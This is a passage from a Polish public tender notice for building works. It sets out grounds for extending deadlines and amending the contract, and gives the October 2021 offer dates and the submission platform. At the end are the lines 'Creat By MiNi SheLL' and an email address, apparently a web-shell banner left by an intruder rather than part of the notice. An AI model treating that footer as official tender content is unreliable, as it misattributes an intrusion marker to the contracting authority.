robót budowlanych;<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może nastąpić w<br/>przypadku wystąpienia kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji<br/>projektowej, lub innymi robotami prowadzonymi przez innego wykonawcę, przy czym<br/>przedłużenie<br/>terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy na usunięcie kolizji z<br/>instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni<br/>niezbędnych<br/>do wykonania robót przez innego wykonawcę – o ile usunięcie kolizji wymagać będzie<br/>przedłużenia<br/>terminu realizacji;<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może nastąpić w<br/>przypadku wystąpienia konieczności wprowadzenia w dokumentacji projektowej zmian,<br/>powodujących<br/>wstrzymanie lub przerwanie robót budowlanych, stanowiących przedmiot zamówienia, przy<br/>czym<br/>przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia<br/>zmian w<br/>dokumentacji projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z właściwymi organami,<br/>uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym<br/>wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą)<br/>zakresu<br/>świadczenia Wykonawcy zawartego w ofercie, stanowiącej załącznik do umowy oraz<br/>zwiększeniem<br/>wynagrodzenia Wykonawcy, o którym mowa w § 6 ust. 1,<br/>5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 4 ust. 1, może nastąpić w<br/>przypadku wystąpienia warunków geologicznych lub hydrologicznych odmiennych od<br/>założonych w<br/>dokumentacji projektowej i powodujących konieczność wstrzymania robót lub konieczność ich<br/>wykonania przy wykorzystaniu odmiennych od zaprojektowanych rozwiązań technicznych, przy<br/>czym<br/>przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wyeliminowania<br/>utrudnień związanych z ich wystąpieniem,<br/>6) konieczności wykonania robót zamiennych (do których wykonania wystarczy zgoda<br/>zamawiającego<br/>oraz projektanta), rozumianych jako wykonanie przez Wykonawcę zamówienia podstawowego w<br/>sposób odmienny od sposobu określonego w umowie, cd. w sekcji "informacje<br/>dodatkowe" <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem Platformy pod adresem: https://pzp.wojciechow.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-28 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 7) przedłużenia terminu wykonania zamówienia w zakresie niezbędnym do wykonania robót<br/>zleconych<br/>na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,<br/>8) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni<br/>wpływ na<br/>realizację przedmiotu zamówienia lub świadczenia stron umowy,<br/>9) w przypadku zmiany albo rezygnacji z podwykonawcy, na którego zasoby wykonawca<br/>powoływał<br/>się w celu wykazania spełniania warunków udziału w postępowaniu Wykonawca jest obowiązany<br/>wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie<br/>spełnia<br/>warunki udziału w postępowaniu, w stopniu nie mniejszym niż wymagany w trakcie<br/>postępowania o<br/>udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów,<br/>potwierdzających spełnianie warunków udziału w postępowaniu,<br/>10) zmiany sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy<br/>wskutek<br/>zaistnienia przyczyn organizacyjnych lub finansowych leżących po stronie Zamawiającego, w<br/>tym na<br/>skutek zawartej przez Zamawiającego umowy o dofinansowanie zadania.<br/>11) wszelkie zmiany, które będą konieczne do zagwarantowania zgodności umowy z<br/>wchodzącymi w<br/>życie po terminie składania ofert lub po zawarciu umowy przepisami prawa w szczególności<br/>przepisami<br/>o podatku od towarów i usług w zakresie wynikającym z tych przepisów,<br/>2. Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej i podpisania<br/>przez<br/>obydwie strony umowy.<br/>3. Z wnioskiem o zmianę umowy może wystąpić zarówno Wykonawca, jak i Zamawiający. ---Ze<br/>względu na ograniczoną ilość znaków pozostałe informacje znajdują się w Załączniku Nr 2 do<br/>SWZ - Projekt umowy par. 9

Creat By MiNi SheLL
Email: jattceo@gmail.com